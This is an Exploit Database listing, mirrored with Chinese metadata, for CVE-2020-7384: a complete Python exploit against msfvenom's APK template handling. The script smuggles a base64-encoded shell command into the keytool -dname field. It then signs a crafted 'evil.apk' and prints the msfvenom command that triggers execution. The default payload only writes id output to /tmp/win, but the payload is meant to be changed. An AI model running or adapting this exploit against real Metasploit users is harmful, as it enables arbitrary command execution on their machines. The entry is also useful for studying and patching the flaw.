Metasploit Framework 6.0.11 – msfvenom APK template command injection

• Exploit Database
• 16 阅读

• 作者： Justin Steven
  日期： 2021-01-28
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/49491/

• # Exploit Title: Metasploit Framework 6.0.11 - msfvenom APK template command injection
  # Exploit Author: Justin Steven
  # Vendor Homepage: https://www.metasploit.com/
  # Software Link: https://www.metasploit.com/
  # Version: Metasploit Framework 6.0.11 and Metasploit Pro 4.18.0
  # CVE : CVE-2020-7384
  
  #!/usr/bin/env python3
  import subprocess
  import tempfile
  import os
  from base64 import b64encode
  
  # Change me
  payload = 'echo "Code execution as $(id)" > /tmp/win'
  
  # b64encode to avoid badchars (keytool is picky)
  payload_b64 = b64encode(payload.encode()).decode()
  dname = f"CN='|echo {payload_b64} | base64 -d | sh #"
  
  print(f"[+] Manufacturing evil apkfile")
  print(f"Payload: {payload}")
  print(f"-dname: {dname}")
  print()
  
  tmpdir = tempfile.mkdtemp()
  apk_file = os.path.join(tmpdir, "evil.apk")
  empty_file = os.path.join(tmpdir, "empty")
  keystore_file = os.path.join(tmpdir, "signing.keystore")
  storepass = keypass = "password"
  key_alias = "signing.key"
  
  # Touch empty_file
  open(empty_file, "w").close()
  
  # Create apk_file
  subprocess.check_call(["zip", "-j", apk_file, empty_file])
  
  # Generate signing key with malicious -dname
  subprocess.check_call(["keytool", "-genkey", "-keystore", keystore_file, "-alias", key_alias, "-storepass", storepass,
   "-keypass", keypass, "-keyalg", "RSA", "-keysize", "2048", "-dname", dname])
  
  # Sign APK using our malicious dname
  subprocess.check_call(["jarsigner", "-sigalg", "SHA1withRSA", "-digestalg", "SHA1", "-keystore", keystore_file,
   "-storepass", storepass, "-keypass", keypass, apk_file, key_alias])
  
  print()
  print(f"[+] Done! apkfile is at {apk_file}")
  print(f"Do: msfvenom -x {apk_file} -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null")